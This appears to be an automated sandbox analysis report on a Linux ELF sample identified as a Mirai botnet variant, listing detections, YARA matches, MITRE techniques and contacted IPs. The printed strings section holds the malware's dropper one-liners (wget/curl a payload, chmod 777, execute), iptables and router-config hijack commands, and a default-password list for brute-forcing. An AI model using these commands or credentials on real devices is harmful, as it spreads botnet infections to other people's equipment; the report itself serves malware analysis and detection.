Edit tour

Linux Analysis Report
bin.sh.elf

Overview

General Information

Sample name:bin.sh.elf
Analysis ID:1650259
MD5:fe597b006a3b685aa0e6680b2f8193a8
SHA1:a9b07391bac6600d7cb21f26308039cf5b94fc5f
SHA256:a9b27492292904b108baf4ae4578b7354d4257094a513e3db48f35b3684cb0eb
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:88
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1650259
Start date and time:2025-03-27 15:38:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bin.sh.elf
Detection:MAL
Classification:mal88.troj.linELF@0/0@0/0
Command:/tmp/bin.sh.elf
PID:6207
Exit Code:135
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • bin.sh.elf (PID: 6207, Parent: 6125, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/bin.sh.elf
  • dash New Fork (PID: 6292, Parent: 4331)
  • rm (PID: 6292, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7
  • dash New Fork (PID: 6293, Parent: 4331)
  • rm (PID: 6293, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
bin.sh.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    bin.sh.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
      bin.sh.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        bin.sh.elfLinux_Trojan_Mirai_5c62e6b2unknownunknown
        • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
        bin.sh.elfLinux_Trojan_Mirai_77137320unknownunknown
        • 0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
          6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
            6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmpLinux_Trojan_Mirai_5c62e6b2unknownunknown
              • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
              6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmpLinux_Trojan_Mirai_77137320unknownunknown
              • 0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
              Click to see the 2 entries
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: bin.sh.elfAvira: detected
              Source: bin.sh.elfVirustotal: Detection: 59%Perma Link
              Source: bin.sh.elfReversingLabs: Detection: 55%
              Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: bin.sh.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
              Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
              Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
              Source: bin.sh.elfString found in binary or memory: http://%s:%d/bin.sh
              Source: bin.sh.elfString found in binary or memory: http://%s:%d/bin.sh;chmod
              Source: bin.sh.elfString found in binary or memory: http://127.0.0.1
              Source: bin.sh.elfString found in binary or memory: http://127.0.0.1sendcmd
              Source: bin.sh.elfString found in binary or memory: http://HTTP/1.1
              Source: bin.sh.elfString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
              Source: bin.sh.elfString found in binary or memory: http://ipinfo.io/ip
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39242
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33608 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39242 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

              System Summary

              barindex
              Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
              Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
              Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
              Source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
              Source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
              Source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
              Source: Initial sampleString containing 'busybox' found: busybox
              Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
              Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
              Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
              Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing potential weak password found: admin
              Source: Initial sampleString containing potential weak password found: default
              Source: Initial sampleString containing potential weak password found: support
              Source: Initial sampleString containing potential weak password found: service
              Source: Initial sampleString containing potential weak password found: supervisor
              Source: Initial sampleString containing potential weak password found: guest
              Source: Initial sampleString containing potential weak password found: administrator
              Source: Initial sampleString containing potential weak password found: 123456
              Source: Initial sampleString containing potential weak password found: 54321
              Source: Initial sampleString containing potential weak password found: password
              Source: Initial sampleString containing potential weak password found: 12345
              Source: Initial sampleString containing potential weak password found: admin1234
              Source: Initial samplePotential command found: GET /c HTTP/1.0
              Source: Initial samplePotential command found: GET %s HTTP/1.1
              Source: Initial samplePotential command found: GET /c
              Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
              Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
              Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
              Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
              Source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
              Source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
              Source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
              Source: classification engineClassification label: mal88.troj.linELF@0/0@0/0
              Source: /usr/bin/dash (PID: 6292)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7Jump to behavior
              Source: /usr/bin/dash (PID: 6293)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7Jump to behavior
              Source: /tmp/bin.sh.elf (PID: 6207)Queries kernel information via 'uname': Jump to behavior
              Source: bin.sh.elf, 6207.1.000055ae61bb0000.000055ae61cbc000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
              Source: bin.sh.elf, 6207.1.00007fffacbc0000.00007fffacbe1000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/bin.sh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bin.sh.elf
              Source: bin.sh.elf, 6207.1.000055ae61bb0000.000055ae61cbc000.rw-.sdmpBinary or memory string: Urg.qemu.gdb.arm.sys.regs">
              Source: bin.sh.elf, 6207.1.000055ae61bb0000.000055ae61cbc000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
              Source: bin.sh.elf, 6207.1.00007fffacbc0000.00007fffacbe1000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
              Source: bin.sh.elf, 6207.1.000055ae61bb0000.000055ae61cbc000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: bin.sh.elf, type: SAMPLE
              Source: Yara matchFile source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bin.sh.elf PID: 6207, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: bin.sh.elf, type: SAMPLE
              Source: Yara matchFile source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bin.sh.elf PID: 6207, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Command and Scripting Interpreter
              1
              Scripting
              Path Interception1
              File Deletion
              1
              Brute Force
              11
              Security Software Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
              Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1650259 Sample: bin.sh.elf Startdate: 27/03/2025 Architecture: LINUX Score: 88 12 109.202.202.202, 80 INIT7CH Switzerland 2->12 14 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->14 16 3 other IPs or domains 2->16 18 Malicious sample detected (through community Yara rule) 2->18 20 Antivirus / Scanner detection for submitted sample 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Yara detected Mirai 2->24 6 dash rm 2->6         started        8 dash rm 2->8         started        10 bin.sh.elf 2->10         started        signatures3 process4
              SourceDetectionScannerLabelLink
              bin.sh.elf60%VirustotalBrowse
              bin.sh.elf56%ReversingLabsLinux.Trojan.Mirai
              bin.sh.elf100%AviraEXP/ELF.Mirai.O
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches

              Download Network PCAP: filteredfull

              No contacted domains info
              NameSourceMaliciousAntivirus DetectionReputation
              http://%s:%d/bin.sh;chmodbin.sh.elffalse
                high
                http://HTTP/1.1bin.sh.elffalse
                  high
                  http://ipinfo.io/ipbin.sh.elffalse
                    high
                    http://127.0.0.1bin.sh.elffalse
                      high
                      http://baidu.com/%s/%s/%d/%s/%s/%s/%s)bin.sh.elffalse
                        high
                        http://%s:%d/bin.shbin.sh.elffalse
                          high
                          http://127.0.0.1sendcmdbin.sh.elffalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            54.171.230.55
                            unknownUnited States
                            16509AMAZON-02USfalse
                            34.249.145.219
                            unknownUnited States
                            16509AMAZON-02USfalse
                            109.202.202.202
                            unknownSwitzerland
                            13030INIT7CHfalse
                            91.189.91.43
                            unknownUnited Kingdom
                            41231CANONICAL-ASGBfalse
                            91.189.91.42
                            unknownUnited Kingdom
                            41231CANONICAL-ASGBfalse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            54.171.230.55na.elfGet hashmaliciousPrometeiBrowse
                              SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                SecuriteInfo.com.Linux.Mirai.2522.5402.17083.elfGet hashmaliciousUnknownBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    x86_64.elfGet hashmaliciousUnknownBrowse
                                      arm.elfGet hashmaliciousUnknownBrowse
                                        na.elfGet hashmaliciousPrometeiBrowse
                                          efefa7.elfGet hashmaliciousMiraiBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                34.249.145.219na.elfGet hashmaliciousPrometeiBrowse
                                                  boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                                    91.189.91.43na.elfGet hashmaliciousPrometeiBrowse
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                        SecuriteInfo.com.FileRepMalware.29874.30583.elfGet hashmaliciousUnknownBrowse
                                                                          SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                                                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                        91.189.91.42na.elfGet hashmaliciousPrometeiBrowse
                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                            SecuriteInfo.com.FileRepMalware.29874.30583.elfGet hashmaliciousUnknownBrowse
                                                                                              SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                                                                                boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            No context
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 91.189.91.42
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 91.189.91.42
                                                                                                            SecuriteInfo.com.Linux.Mirai.4306.30063.19032.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 185.125.190.26
                                                                                                            SecuriteInfo.com.FileRepMalware.29874.30583.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.189.91.42
                                                                                                            SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 91.189.91.42
                                                                                                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 91.189.91.42
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 91.189.91.42
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 91.189.91.42
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 91.189.91.42
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 91.189.91.42
                                                                                                            AMAZON-02USna.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 54.171.230.55
                                                                                                            220-002-1.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.226.94.59
                                                                                                            https://www.transfernow.net/dl/20250326vT4te41FGet hashmaliciousUnknownBrowse
                                                                                                            • 13.216.34.24
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 34.249.145.219
                                                                                                            http://gitmeidlaw.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 13.33.252.122
                                                                                                            https://www.canva.com/design/DAGiRhhTm_M/1Wb1338QF_BEv0zYs4WfZQ/view?utm_content=DAGiRhhTm_M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h6159cd66cf&umid=b05be093-6f53-49ec-8a3b-87bea166f93e&auth=5175c0148660b71d9cf40f5d2581457ec88fc189-b6bc2ea861a256fc841ad8d60030f2289750b83Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.35.93.29
                                                                                                            SecuriteInfo.com.Linux.Mirai.4306.30063.19032.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 54.247.62.1
                                                                                                            https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                            • 3.168.73.27
                                                                                                            SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 54.171.230.55
                                                                                                            SecuriteInfo.com.Linux.Mirai.2522.5402.17083.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 54.171.230.55
                                                                                                            INIT7CHna.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 109.202.202.202
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
